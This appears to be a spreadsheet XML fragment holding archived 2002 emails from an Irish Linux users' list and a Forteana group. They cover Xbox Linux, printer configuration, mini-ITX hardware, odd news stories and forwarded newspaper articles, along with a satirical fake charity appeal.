    <t xml:space="preserve">Actually, I'd be more inclined to look into:http://www.theregister.co.uk/content/54/27489.htmlAvoiding giving any cash to a certain corporation P&gt; -----Original Message-----
&gt; &gt;I'd normally never buy this but the Xbox is Eur300 on IOL's shop, a very
&gt; &gt;large company are making a loss on it and:
&gt; &gt;
&gt; &gt;http://xbox-linux.sourceforge.net/articles.php?aid=1âŠ‚=Press%20Release%
&gt; 3A%20Xbox%20Linux%20Mandrake%209%20Released
&gt; &gt;
&gt; &gt;Mandrake has been released for it.
&gt; 
&gt; isn't it Â¤250 in Smyths?
&gt; 
&gt; don't forget to add to that the modchip, and the time to put it on.
&gt; 
&gt; (/me thinks unless you want 3d graphics, www.mini-itx.com is the way to go
&gt; :))
&gt; -- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">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place.Greg
</t>
  </si>
  <si>
    <t xml:space="preserve">-----Original Message-----Subject: please give generously&gt; &gt;
&gt; &gt;
&gt; &gt;
&gt; &gt; Please give generously...
&gt; &gt;
&gt; &gt; URGENT - DUDLEY EARTHQUAKE APPEAL
&gt; &gt;
&gt; &gt; At 00:54 on Monday 23 September an earthquake measuring 4.8 on the
&gt; &gt;
&gt; &gt; Richter scale hit Dudley,UK causing untold disruption and distress -
&gt; &gt;
&gt; &gt; * Many were woken well before their giro arrived
&gt; &gt;
&gt; &gt; * Several priceless collections of mementos from the Balearics and
&gt; &gt;
&gt; &gt; Spanish costas were damaged
&gt; &gt;
&gt; &gt; * Three areas of historic and scientifically significant litter were
&gt; &gt;
&gt; &gt; disturbed
&gt; &gt;
&gt; &gt; * Thousands are confused and bewildered, trying to come to terms with
&gt; &gt;
&gt; &gt; the fact that something interesting has happened in Dudley
&gt; &gt;
&gt; &gt; One resident, Donna-Marie Dutton, a 17 year old mother-of-three said "It
&gt; &gt;
&gt; &gt; was such a shock, little Chantal-Leanne came running into my bedroom
&gt; &gt;
&gt; &gt; crying. My youngest two, Tyler-Morgan and Megan-Storm slept through it.
&gt; &gt;
&gt; &gt; I was still shaking when I was watching Trisha the next morning."
&gt; &gt;
&gt; &gt; Apparently though, looting did carry on as normal.
&gt; &gt;
&gt; &gt; The British Red Cross have so far managed to ship 4000 crates of Sunny
&gt; &gt;
&gt; &gt; Delight to the area to help the stricken masses.
&gt; &gt;
&gt; &gt; Rescue workers are still searching through the rubble and have found
&gt; &gt;
&gt; &gt; large quantities of personal belongings including benefit books and
&gt; &gt;
&gt; &gt; jewellery from Elizabeth Duke at Argos.
&gt; &gt;
&gt; &gt; HOW YOU CAN HELP
&gt; &gt;
&gt; &gt; * Â£2 buys chips, scraps and blue pop for a family of four
&gt; &gt;
&gt; &gt; * Â£10 can take a family to Stourport for the day, where children can
&gt; &gt;
&gt; &gt; play on an unspoiled canal bank among the national collection of
&gt; &gt;
&gt; &gt; stinging nettles
&gt; &gt;
&gt; &gt; * 22p buys a biro for filling in a spurious compensation claim
&gt; &gt;
&gt; &gt; PLEASE ACT NOW
&gt; &gt;
&gt; &gt; Simply email us by return with your credit card details and we'll do the
&gt; &gt;
&gt; &gt; rest! If you prefer to donate cash, there are collection points
&gt; &gt;
&gt; &gt; available at your local branches of Argos, Iceland and Clinton Cards.
&gt; &gt;
_________________________________________________________________
Join the world's largest e-mail service with MSN Hotmail. 
http://www.hotmail.com------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
Home Selling? Try Us!
http://us.click.yahoo.com/QrPZMC/iTmEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">From: Steve Speer
Subject: http://english.pravda.ru/main/2002/10/05/37771.html[not sure what the rules for crossposting between the two groups is...
  my reasoning is that it's a major newspaper reporting evidence of
  alien life so.... /t]
-- http://loopNY.com ......................An "open loop": shows every Saturday!
http://extremeNY.com/submit .......................... submit to the calendar.------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
Sell a Home with Ease!
http://us.click.yahoo.com/SrPZMC/kTmEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve"> I seem to be having a little trouble with it. My printers.conf is:
Info Hp4050
Location locals
DeviceURI ipp://192.168.2.90:9100/
State Idle
Accepting Yes
JobSheets none none
QuotaPeriod 0
PageLimit 0
KLimit 0
 and cupds uses that to make a printcap of:lp: Sounds dodgy to me. If someone has an example printers.conf/printcap for
a JetDirect printer, I'd appreciate it if they sent it on.John-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 2002-10-08 at 14:13, John Moylan wrote:
&gt; Hmm, speaking of cheap machines etc, has anyone tried this sort of 
&gt; thing: http://www.mini-itx.com/projects/humidor64/ ? or more importantly 
&gt; has anyone had any positive/negative experiences with the Via mini-itx 
&gt; boards/via c3 processors.
&gt; I recall a thread last year about building a custom MP3/CD/Game/vcd 
&gt; recorder machine, these systems seem to hit the mark. Also, I need to 
&gt; build a new box, and I was thinking about something that would be as 
&gt; unobtrusive as possible in my living room;)
&gt; 
&gt; John
The forums there are very informative, and there is also more info on
using linux on the mini ITX boards at http://linitx.org/.A couple of the autopc projects make interesting reading in this regard:
http://thisstrife.com/ but most of them seem to use windows for some
unknown reason.....HTHPhil -- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.ouchytheclown.com/welcome.html------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 27 Aug 2002 MICGRANGER@aol.com wrote:&gt; Concerning this mail, what is your intention?When posting to this list excerpts from books I've just read, I usually
refrain from adding any comments, letting the listmembers interpret them
as they see fit.But since you asked....I chose to post this text simply because I thought it was a particularly
risible example of Doyle's invincible faith and his refusal to accept the
fucking obvious.bc
------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">David asked:
&gt; My wife noticed something odd.  The nearly-full moon was about 30
&gt; degrees above the horizon.  There was a notable glow on the horizon,
&gt; except under the moon.  The moon seemed to be in a column of darkness
&gt; that was about three times the apparent width of the moon.  We could see
&gt; the column over its entire length as a strip of sky darker than the sky
&gt; around it.
&gt;
&gt; Any of you ever see this?  Do you have any idea what could have caused
&gt; it?  I suspect it's due to some pecularity of the visual system, but
&gt; have no clear idea.I'm surprised to not find this phenomenon in Corlis. I could have sworn I
saw it there. He does have the somewhat similar dark sky between a rainbow
and a secondary bow. I personally have seen a rainbow enclosing a
semi-circle of darker sky.I know I've read about pillars under the Sun and Moon elsewhere, but I can't
recall if they were reportedly dark or bright. I do know these sorts of
things are supposed to be quirks of optics not of the visual system. I'm
sorry I haven't got any answers, but a search through some books on
atmospheric optics ought to turn a few hints up.BillWilliam Jacobs
Freelance Unemployed Person
------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">&gt;peter fwded:
&gt;&gt;Finally, Constable Evans hurled a thong at the animal, hitting it on the
&gt;&gt;head.
&gt;
&gt;I know this isn't *quite* as funny to Australians as it is to
&gt;everyone else. Honestly.
&gt;
&gt;Rachel
&gt;not that walloping it with a flip-flop isn't hilarious too...
&gt;--well unless you used the thong like a sling shot.....
-- 
Fel
http://www.frogstone.net
Weird Page: http://my.athenet.net/~felinda/WeirdPage.html[Non-text portions of this message have been removed]
------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">&gt;David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up.Some links:comprehensive
http://www.meteoros.de/indexe.htmAtmospheric Light Phenomena
http://www.auf.asn.au/meteorology/section12.htmlinteresting observational stuff from the prior millenium including pix
(click 1997 / colour plates)
http://www.ursa.fi/ursa/jaostot/halot/ehp/index.htmlmore pix, many of which flip to negative to highlight details (hover cursor)
http://idefix.taide.turkuamk.fi/~iluukkon/taivas/valok/88.html and
subsequent linksjohn k
------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">&gt; An illusionist has emerged after 24 hours underwater in a case in New York's
&gt; Times Square.I'd just like to recommend the newest Viz to ukers just for the hilarious "David 
Blaine: Stalag Magician".  The ego'd one is in a WWII prison camp and sort of 
trying to escape.  Several times he seems to have escaped and the british 
officers celebrate before it's revealed he's been buried alive or hiding in a 
freezer.  At one point he's asked why and says "Well it's not for publicity" 
Cracking stuff.Stew
-- 
Stewart Smith
Scottish Microelectronics Centre, University of Edinburgh.
http://www.ee.ed.ac.uk/~sxs/
------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">&gt; So now Osama bin Laden is Hitler. And Saddam Hussein is Hitler. And
&gt; George Bush is fighting the Nazis. Someone should shout "Godwin!" at him at a press conference.  Then he'd have to 
shut up.  Or does that only work on Usenet?Stew
-- 
Stewart Smith
Scottish Microelectronics Centre, University of Edinburgh.
http://www.ee.ed.ac.uk/~sxs/
------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 27 Aug 2002 10:15:36 -0500 (EST)
Jay Lake  wrote:
&gt;Second, one could make the assumption that ancient or future civilizations
&gt;would not be hydrocarbon based. There are alternative fuel sources,
&gt;including seabed methane, biomass and all the usual suspects -- solar,
&gt;hydro etc. Some of these could be exploited on a decidedly low-tech (ie,
&gt;emergent civilization) basis. However, it is difficult to conceive of an
&gt;industrial civilization that doesn't employ wheels, axles and bearings,
&gt;all of which require lubrication. I'm not an engineer (Robin, anyone?) but
&gt;it's my understanding that vegetable lubrication breaks down under stress,
&gt;and that oil or graphite lubricants are the only reasonable choices for
&gt;high temperature/high rotation applications, at least prior to extremely
&gt;advanced modes of chemical synthesis.This is a good point. There are a lot of alternatives to hydrocarbon
products derived from petroleum, but these have often been developed as
a replacement for petroleum after the technology has been established -
there is a growing industry in plant-derived plastics and lubricants,
but this is to replicate materials that have been previously created 
much more easily within the petrochemical industry.Vegetable-derived lubricants have been used. The Russians used sunflower
oil in the lubrication systems of tanks and trucks during the second world 
war, and work is being done in the UK to produce diesel fuel derived from
waste cooking oil from fast-food restaurants. Jay's correct in his opinion that vegetable oil is not as durable as 
petroleum oil, but this is only because of the lack of sophistication 
of the chemistry involved. Synthetic fuels and lubricants are continuously
being developed, and I don't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lubricants.My big concern is if the technology were ever to be lost for some reason.
Re-creating a petrochemical industry from scratch without petrochemicals
(that is, going immediately to plant-based synthetics) would be extremely 
difficult, especially if it were necessary to recreate *all* of the
petrochemical-derived products (not just lubricants and fuels). I suspect
that, bearing in mind the ingenuity of the human race, it would happen,
just at a different pace. Imagine an industrial revollution based on,
for example, methane from pig manure, or diesel oil from sunflowers.All we would then have to do is get used to all the machines smelling
like pig farms and fish and chip shops...Robin Hill, STEAMY BESS, Brough, East Yorkshire********************************************************************
This email and any attachments are confidential to the intended
recipient and may also be privileged. If you are not the intended
recipient please delete it from your system and notify the sender.
You should not copy it or use it for any purpose nor disclose or
distribute its contents to any other person.
********************************************************************------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">http://news.bbc.co.uk/1/hi/world/asia-pacific/2220132.stmTuesday, 27 August, 2002, 21:35 GMT 22:35 UK
Cambodia temple ruins yield treasureWorkers clearing dense jungle near the ruins of an ancient pagoda in
northern Cambodia have unearthed 31 Buddha statues - 27 of them solid gold.
The statues - which are 10 centimetres (4 inches) tall - are in good
condition and believed to be hundreds of years old.
They were found on Saturday as workers were rebuilding the Po Pich temple
about 100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 three of which were silver and one bronze - were buried in about one metre
(3.4ft) of earth and each weigh around 500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1970 and 1998 and
controlled the country between 1975 and 1979.
The regime outlawed religion and destroyed many objects regarded as decadent
or culturally impure.
About two million people died in the Khmer Rouge's drive to turn Cambodia
into a farmers' utopia.
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">http://www.guardian.co.uk/uk_news/story/0,3604,781616,00.htmlBritons stand tall, if slightly heavy, in EuropeJohn Carvel, social affairs editor
Wednesday August 28, 2002
The GuardianNot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completed a study of the pulling force needed to
open ring pull cans.------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">The Electronic Telegraph Emigrate to Russia? That's a steppe too far
 (Filed: 28/08/2002) 
 So you think you've got it bad: fed up with Folkestone, bored with Birmingham
 or sick of Sheffield.
 Those 54 per cent of Britons - according to a Daily Telegraph/YouGov survey
 this week - who dream of a stress-free life in sunnier climes should perhaps
 heed a word of friendly advice on the realities of living abroad.
 Kommersant, a Russian daily newspaper, yesterday offered those dissatisfied
 with life in Blair's Britain a taste of what to expect should they choose to
 emigrate to provincial Russia.
 After reading about the gripes of affluent Britons, its tongue-in-cheek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 perhaps the opportunity for a quiet cup of
 tea and a chocolate Hobnob - is known in Russia as the Wolf Hour.
 It was so named in Soviet times because at 11am a wolf appeared from the
 famous animal clock at the Obrasov Puppet Theatre in Moscow. It is also
 opening time in the nation's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100 kopecks in a ruble and the ruble is currently worth about a
 halfpenny in sterling.
 The whisky is cheap, however, because it is unlike anything the average Briton
 will have consumed before. It is made of samagon - home-distilled, moonshine
 vodka - coloured with tea, and is a popular beverage in rural areas and among
 diehard alcoholics.
 While alcohol is plentiful and cheap, food may not be so easy to come by. The
 newspaper pointed out that traditional British foodstuffs - it selected oxtail
 soup as an example - were in short supply. However, the wealth of the British
 settler should overcome the difficulty.
 "For a modest reward in most Russian villages, the locals would happily cut
 off the tails from the entire collective farm's herd of cattle."
 One or two potential emigrÃ©s might be deterred by language difficulties. There
 are few English speakers to be found among the green hills of Tula on the
 Mongolian border.
 However, Kommersant pointed out, language difficulties were not considered a
 deterrent by the 13 per cent of Britons who nominated France as the country in
 which they would like to live.
 France, the Russian paper claimed, was a country "where English is only known
 by the beggars, Belorussian prostitutes and Russian tourists".
 Despite the low cost of living and the easy-going lifestyle, the Russian
 weather remains a major stumbling block for Britons.
 Even in the most temperate regions, winter temperatures of -20C are common.
 And somewhere like the Sakha Republic - east of Siberia and the coldest place
 in the world - enjoys just one month of summer and endures winter temperatures
 that drop below -70C. Houses are built on concrete stilts because the
 permafrost makes digging foundations impossible.
 Again, the Russian paper had a word of reassurance. While acknowledging the
 climatic problems, it said that "thanks to global warming this difficulty will
 solve itself".
 Kommersant also had an answer to the labour crisis that would be created in
 Britain if 54 per cent of its citizens decided to opt for a life in Russia.
 "Thirty-three million Russians could be sent to Britain to replace the 33
 million who leave. We think that the required number could probably be found
 amongst our citizens."
 Unfortunately for those 33 million Russians, however, not one of those Britons
 surveyed who wanted to move abroad nominated the Russian steppes as their
 preferred new home.
------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">The Electronic Telegraph Six arrested for attacking Palio jockey who defected 
 By Bruce Johnston in Rome
 (Filed: 28/08/2002) 
 Police waded into the intrigues and enmities surrounding the Palio, Siena's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38 runs, was closely associated with the Istrice, or Porcupine,
 contrada - section of town - until the race earlier this month.
 Istrice did not have a horse in the contest - only 10 of the 17 contradas take
 part in each Palio - but, despite promises to the contrary, moments before the
 off Mr Pes mounted the horse of Lupa, or She-Wolf.
 Lupa are Istrice's historic rivals, and the defection was not taken well. Lupa
 did not win, victory going instead to Tartuca, tortoise.
 As its supporters erupted into joyous celebrations, Mr Pes was pulled from his
 mount by Istrice members and savagely beaten and kicked for seven minutes.
 Mr Pes, 39, whose jacket with his contrada's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 known as
 contradaioli - had been arrested for beating up a jockey, despite the fact
 that such episodes belong to the race's ancient traditions.
 The Palio, which was first raced in the 14th century, is held twice a year on
 the cobbles of Siena's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Siena's fiercely earned independence from Florence and other city states.
 The first Palio of the year takes place on July 2, to commemorate the miracles
 of the Madonna of Provenzano, and a second race on Aug 16 marks the feast of
 the Assumption of the Virgin.
------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">http://media.guardian.co.uk/broadcast/comment/0,7493,781769,00.htmlHamza's horrid - but we must tolerate himRod Liddle
Wednesday August 28, 2002
The GuardianSheikh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his access to the
media is restricted by internal policing within broadcasting corporations
and the press. And this last point is because, we tell ourselves, endlessly
- repeating the mantra over and over again, and fervently wishing it to be
true - Hamza is not "representative" of British Muslims, as if British
Muslims were a simple, homogenous thing with a single voice that one could
turn to every now and then for explanation. And perhaps succour.
The trouble is, in the first month or so after the twin towers attack he was
revealed to be rather more "representative" than the list of those
government-approved Muslim spokesmen who were - uncomfortably, I suspect -
dragooned briefly into statements of support for the war against terrorism
and a blanket condemnation of the Taliban.
An opinion poll commissioned by Radio 4's Today programme revealed that an
overwhelming majority of British Muslims were against George Bush's crusade.
One in six were, to put it mildly, ambivalent about the attack on the US
(the remainder condemned the attack unequivocally). A large majority thought
the war against terrorism was a war against Islam.
Which is what Hamza said, repeatedly. But it was something that, at the
time, we didn't want to hear. Now, if you quiz the man on present policy at
home and abroad he comes across - superficially, at least - as someone from
the liberal left. No war against Iraq; Britain to become independent of US
foreign policy and attempt rapprochement with Arab states; stronger action
against Israel; mistrust of global capitalism; redistribution of wealth.
Nor is he particularly anti-semitic, so far as I can tell, although I don't
suppose he will be holidaying in Eilat this year. In yesterday's Guardian,
the chief rabbi expressed a willingness to talk to Hamza and was grateful
for the sheikh's message of condolence when a London synagogue was attacked.
Which is not to say that Hamza is a peaceable Jeffersonian democrat who has
been wilfully misrepresented: he is, without question, rather more
inflammatory in private sermons to his own people than he is in public. His
ideology is an arid and uncompromising interpretation of Islam: he would be
happy, in a truly Islamic society, to stone women to death for adultery, for
example. You and I would find many - perhaps most - of his views utterly
repellent.
And that's the point. Because Hamza is the true test of our apparent desire
to be multicultural. Multiculturalism is not, surely, the cheerful
appropriation of bits of inoffensive minority cultural behaviour by the
ruling hegemony. That is a sort of syncopated monoculturalism.
Multiculturalism is, rather, the ability of society to tolerate views that
are antithetical to the dominant culture - and maybe learn from them.
The FBI has been investigating Hamza, but, of course, has found nothing
remotely incriminating. The real reason for his vilification and persecution
is simply the pungency of his views.
It is often said that we should shut him up or arrest him because his
rhetoric increases hostility against the Muslim population generally. This
is a perfectly noble argument, but it does not wash.
You don't defuse a difficult situation by pretending it doesn't exist. And
if British Muslims - maybe a minority, maybe not - feel a growing sense of
unease or mystification at the direction of western foreign policy, it is
not because they have been led in that direction by Hamza. Shutting the man
up, therefore, won't make a difference.
It is rather as Louis MacNeice had it:
The glass is falling hour by hour, the glass will fall for ever.
But if you break the bloody glass, you won't hold up the weather.
------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">http://yorkshirepost.co.uk/ed/front/481722Pro-hunt activists target top sightONE of Yorkshire's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Pro-hunt activists in the Real Countryside Alliance (RCA) Â­ a radical
alternative to the better-known Countryside Alliance Â­ admitted
responsibility last night for targeting the two images.
The 314ft by 228ft landmark at Kilburn has been lovingly preserved since it
was carved in the limestone by schoolmaster John Hodgson and his pupils in
1857.
But during Monday night someone nailed on a massive figure of a huntsman
with a horn Â­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Â­ a tractor and trailer or a
lorry Â­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Â­ which would be much more of a problem. It
would seem it was carefully plotted beforehand."
An RCA spokesman said: "Some people in the country are getting very
frustrated at the inaction. All we want is Ministers to take notice. Marches
don't seem to be doing anything good."
The Countryside Alliance said it did not have any part in the action.
Spokesman Adrian Yelland said: "The Countryside Alliance only ever advocates
campaigning that is lawful and dissociates itself from acts of vandalism and
regrets any damage that may have been caused by this incident."
The incident follows graffiti on road signs and motorway bridges in
Yorkshire thought to be RCA work.------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;From todays Sun:
http://www.thesun.co.uk/article/0,,5-2002392050,00.htmlYour vote on Crop Idol 
By OLIVER HARVEYWELCOME to Crop Idol Â–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beneath.Calls cost only 10p, or 12 cents from the Republic of Ireland (though it ma=
y be a bit more if you contact us from other planets).Lines close at 6pm today. We will reveal the
winner tomorrow.
Aliens ... or hoaxers?
THE debate continues to rage over the origin of crop circles.Many believe they are simply the work of human hoaxers Â— while others are c=
onvinced they are made by aliens trying to communicate with us.Crop circle enthusiasts insist that some of the designs appear so quickly a=
nd on such a vast scale that it is impossible for humans to have made them. =
Witnesses even claim to have seen balls of light moving through the fields =
on the nights that circles appear.Researchers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England.Theories about their cause include whirlwinds Â— known to circle experts as =
plasma vortexes Â— earth energies from ley lines or even forces from the huma=
n mind.In the past the circles have also been blamed on mating roe deer, hedgehogs=
, helicopters and holes in the ozone layer.Raymond Cox, Chairman of the Centre for Crop Circle Studies, said last nigh=
t: "It's a great unsolved mystery."We know not all crop circles are created by humans but we cannot say for s=
ure what is making them."Plus lots of photos
------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">
&gt; Sheikh Abu Hamza al-Masri, our maddest of mad mullahs and a cartoon bogeyman
&gt; to scare the kiddies, spent a quiet and contemplative bank holiday playing
&gt; with his own children in Victoria Park, Hackney.For an alternative, and rather more factually based, rundown on Hamza's 
career, including his belief that all non Muslims in Yemen should be murdered 
outright:http://memri.org/bin/articles.cgi?Page=archives&amp;Area=ia&amp;ID=IA7201Martin
------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">The Times August 28, 2002
 It's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2002, according to Daniel Bamping,
 founder of the British Big Cats Society, which in the past 12 months has
 received more than 800 reports of big cat sightings. 
 Â“During the first six months we have seen an incredible amount of big cat
 activity. We have now had reports in every single county; the response from
 the public has been fantastic,Â” Mr Bamping said. Â“Big cats in Britain are
 real. They are out there, they are breeding; thereÂ’s more of them.Â” 
 Scotland and Gloucestershire are said to be hotspots of big cat activity. Mark
 Fraser, who heads the societyÂ’s Scottish arm, said: Â“Lynx are now present in
 the Scottish countryside; I believe they are established and breeding. I donÂ’t
 want to hazard a guess at the numbers; suffice it to say there are several
 hotspots, notably Fife, Aberdeenshire, Inverness and the Borders.Â”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trigger-cameras throughout the country to capture further evidence of the
 beasts, which it will then present to the Government. 
 It is not, however, clear on what it wants the Government to do about it all.
 Throwing its weight behind the pro-hunting lobby might be a start. 
 Next in August: record abductions by aliens.
------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">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activists'Pro-hunt activists have defaced two of the country's national monuments - 
the two giant white horses - to highlight their causeCampaigners for the Real Countryside Alliance say they targeted the two 
images, on hills in Oxfordshire and North Yorkshire, "to keep the pro-hunt 
thing in the papers".
Ananova:Giant horse images 'defaced by hunting activists'Pro-hunt activists have defaced two of the country's national monuments - 
the two giant white horses - to highlight their cause.Campaigners for the Real Countryside Alliance say they targeted the two 
images, on hills in Oxfordshire and North Yorkshire, "to keep the pro-hunt 
thing in the papers".Aerial shots show the 374ft-long Bronze Age image on the Berkshire Downs 
near Uffington in Oxfordshire complete with three white hounds and a rider.In North Yorkshire, a rider in full hunt regalia has been added to the 300ft 
White Horse cut in to the hills at Kilburn, which dates back to the 1700s.But no-one reported anything to the police.A spokesman for North Yorkshire police said no reports had been received but 
he had seen "a red blob" on the horse and had sent officers to investigate.In Uffington, no-one in the village had heard anything about the reported 
incident. A spokesman for Thames Valley police said he was not aware of any 
complaints.Activists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---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">&gt;JUST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Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
